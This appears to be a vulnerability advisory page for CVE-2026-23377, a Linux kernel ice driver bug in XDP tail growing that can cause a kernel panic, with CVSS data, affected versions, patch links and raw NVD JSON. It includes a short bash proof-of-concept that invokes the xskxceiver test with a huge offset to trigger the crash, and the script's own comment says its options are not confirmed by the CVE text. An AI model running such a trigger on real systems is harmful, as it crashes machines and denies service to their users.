Security Vulnerability Report
CVE-2026-23377 CVSS 5.5 MEDIUM

CVE-2026-23377

Published: 2026-03-25 11:16:38
Last Modified: 2026-04-28 18:48:59
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ice: change XDP RxQ frag_size from DMA write length to xdp.frame_sz

The only user of frag_size field in XDP RxQ info is bpf_xdp_frags_increase_tail(). It clearly expects whole buff size instead of DMA write size. Different assumptions in ice driver configuration lead to negative tailroom.

This allows to trigger kernel panic, when using XDP_ADJUST_TAIL_GROW_MULTI_BUFF xskxceiver test and changing packet size to 6912 and the requested offset to a huge value, e.g. XSK_UMEM__MAX_FRAME_SIZE * 100.

Due to other quirks of the ZC configuration in ice, panic is not observed in ZC mode, but tailroom growing still fails when it should not.

Use fill queue buffer truesize instead of DMA write size in XDP RxQ info. Fix ZC mode too by using the new helper.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.3 up to, but not including, 6.19.7) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (ice driver module)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC trigger for CVE-2026-23377
# Requires xskxceiver tool and configured interface
# Options -p and -o are as given on this page; the CVE description refers to
# changing the test's packet size and requested offset.

INTERFACE="eth0"
PACKET_SIZE=6912
OFFSET=$((9728 * 100))  # XSK_UMEM__MAX_FRAME_SIZE * 100

# Execute the test case that triggers negative tailroom calculation
./xskxceiver -i "$INTERFACE" \
    -t XDP_ADJUST_TAIL_GROW_MULTI_BUFF \
    -p "$PACKET_SIZE" \
    -o "$OFFSET"

# Note: This attempts to grow the tail with a massive offset,
# triggering the calculation error in the ice driver.

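References

https://git.kernel.org/stable/c/b0f05100e8795aadd1c0606bae9caefbda070d63 (Patch)
https://git.kernel.org/stable/c/e142dc4ef0f451b7ef99d09aaa84e9389af629d7 (Patch)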

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23377", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:37.520", "lastModified": "2026-04-28T18:48:58.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: change XDP RxQ frag_size from DMA write length to xdp.frame_sz\n\nThe only user of frag_size field in XDP RxQ info is\nbpf_xdp_frags_increase_tail(). It clearly expects whole buff size instead\nof DMA write size. Different assumptions in ice driver configuration lead\nto negative tailroom.\n\nThis allows to trigger kernel panic, when using\nXDP_ADJUST_TAIL_GROW_MULTI_BUFF xskxceiver test and changing packet size to\n6912 and the requested offset to a huge value, e.g.\nXSK_UMEM__MAX_FRAME_SIZE * 100.\n\nDue to other quirks of the ZC configuration in ice, panic is not observed\nin ZC mode, but tailroom growing still fails when it should not.\n\nUse fill queue buffer truesize instead of DMA write size in XDP RxQ info.\nFix ZC mode too by using the new helper."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nice: cambiar frag_size de XDP RxQ de la longitud de escritura DMA a xdp.frame_sz\n\nEl único usuario del campo frag_size en la información de XDP RxQ es bpf_xdp_frags_increase_tail(). Claramente espera el tamaño completo del búfer en lugar del tamaño de escritura DMA. 
Diferentes suposiciones en la configuración del controlador ice llevan a un tailroom negativo.\n\nEsto permite activar un pánico del kernel, al usar la prueba xskxceiver XDP_ADJUST_TAIL_GROW_MULTI_BUFF y cambiar el tamaño del paquete a 6912 y el desplazamiento solicitado a un valor enorme, por ejemplo, XSK_UMEM__MAX_FRAME_SIZE * 100.\n\nDebido a otras peculiaridades de la configuración ZC en ice, no se observa pánico en modo ZC, pero el crecimiento del tailroom sigue fallando cuando no debería.\n\nUsar el tamaño real del búfer de la cola de llenado en lugar del tamaño de escritura DMA en la información de XDP RxQ. Corregir el modo ZC también usando la nueva función auxiliar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.19.7", "matchCriteriaId": "773D6612-E903-45AF-AD3C-5A967BCBBB1E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/b0f05100e8795aadd1c0606bae9caefbda070d63", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e142dc4ef0f451b7ef99d09aaa84e9389af629d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}